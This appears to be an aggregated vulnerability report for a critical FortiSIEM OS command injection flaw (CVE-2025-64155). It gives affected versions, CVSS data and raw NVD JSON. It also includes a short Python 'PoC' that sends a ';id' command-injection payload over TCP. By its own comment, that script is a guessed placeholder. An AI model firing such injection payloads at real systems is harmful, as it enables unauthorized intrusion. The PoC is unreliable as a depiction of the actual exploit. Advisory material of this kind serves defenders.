Security Vulnerability Report
CVE-2025-64155 CVSS 9.8 CRITICAL

Published: 2026-01-13 17:15:58
Last Modified: 2026-01-20 16:16:06

Description

An improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an attacker to execute unauthorized code or commands via crafted TCP requests.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

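cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* (from 6.7.0 inclusive, before 7.1.9) - VULNERABLE
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* (from 7.2.0 inclusive, before 7.2.7) - VULNERABLE
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* (from 7.3.0 inclusive, before 7.3.5) - VULNERABLE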
cpe:2.3:a:fortinet:fortisiem:7.4.0:*:*:*:*:*:*:* - VULNERABLE
FortiSIEM 7.4.0
FortiSIEM 7.3.0 - 7.3.4
FortiSIEM 7.1.0 - 7.1.8
FortiSIEM 7.0.0 - 7.0.4
FortiSIEM 6.7.0 - 6.7.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-64155 PoC - FortiSIEM OS Command Injection
Reference: https://github.com/horizon3ai/CVE-2025-64155
Note: This is for educational and authorized testing purposes only
"""
import socket
import sys
import argparse


def exploit_fortisiem(target_ip, target_port=514):
    """
    Exploit CVE-2025-64155 by sending crafted TCP request
    with OS command injection payload
    """
    # Construct malicious payload with command injection
    # The actual payload structure depends on FortiSIEM's TCP service
    payload = b';id\n'  # Simple test payload - inject 'id' command
    try:
        print(f'[*] Connecting to {target_ip}:{target_port}')
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        print(f'[*] Sending exploit payload...')
        sock.send(payload)
        print(f'[*] Receiving response...')
        response = sock.recv(4096)
        print(f'[+] Response: {response.decode("utf-8", errors="ignore")}')
        sock.close()
        return True
    except Exception as e:
        print(f'[-] Error: {str(e)}')
        return False


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-64155 PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('-p', '--port', type=int, default=514, help='Target port')
    args = parser.parse_args()
    exploit_fortisiem(args.target, args.port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64155", "sourceIdentifier": "[email protected]", "published": "2026-01-13T17:15:58.440", "lastModified": "2026-01-20T16:16:06.200", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an attacker to execute unauthorized code or commands via crafted TCP requests."}, {"lang": "es", "value": "Una vulnerabilidad de neutralización inadecuada de elementos especiales utilizados en un comando de sistema operativo ('inyección de comandos de sistema operativo') en Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 a 7.3.4, FortiSIEM 7.1.0 a 7.1.8, FortiSIEM 7.0.0 a 7.0.4, FortiSIEM 6.7.0 a 6.7.10 puede permitir a un atacante ejecutar código o comandos no autorizados a través de solicitudes TCP manipuladas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7.0", "versionEndExcluding": "7.1.9", "matchCriteriaId": "409EC360-68C2-4098-AC99-8310913D8EC0"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.7", "matchCriteriaId": "2A8C7360-73D5-4629-B1C3-47B6C7AD9678"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3.0", "versionEndExcluding": "7.3.5", "matchCriteriaId": "C41BBF42-F97A-4358-ADB6-9762BD8F3CAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisiem:7.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "500DAB25-48C9-48C7-B7CD-92C06989F039"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-772", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/horizon3ai/CVE-2025-64155", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/purehate/CVE-2025-64155-hunter", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}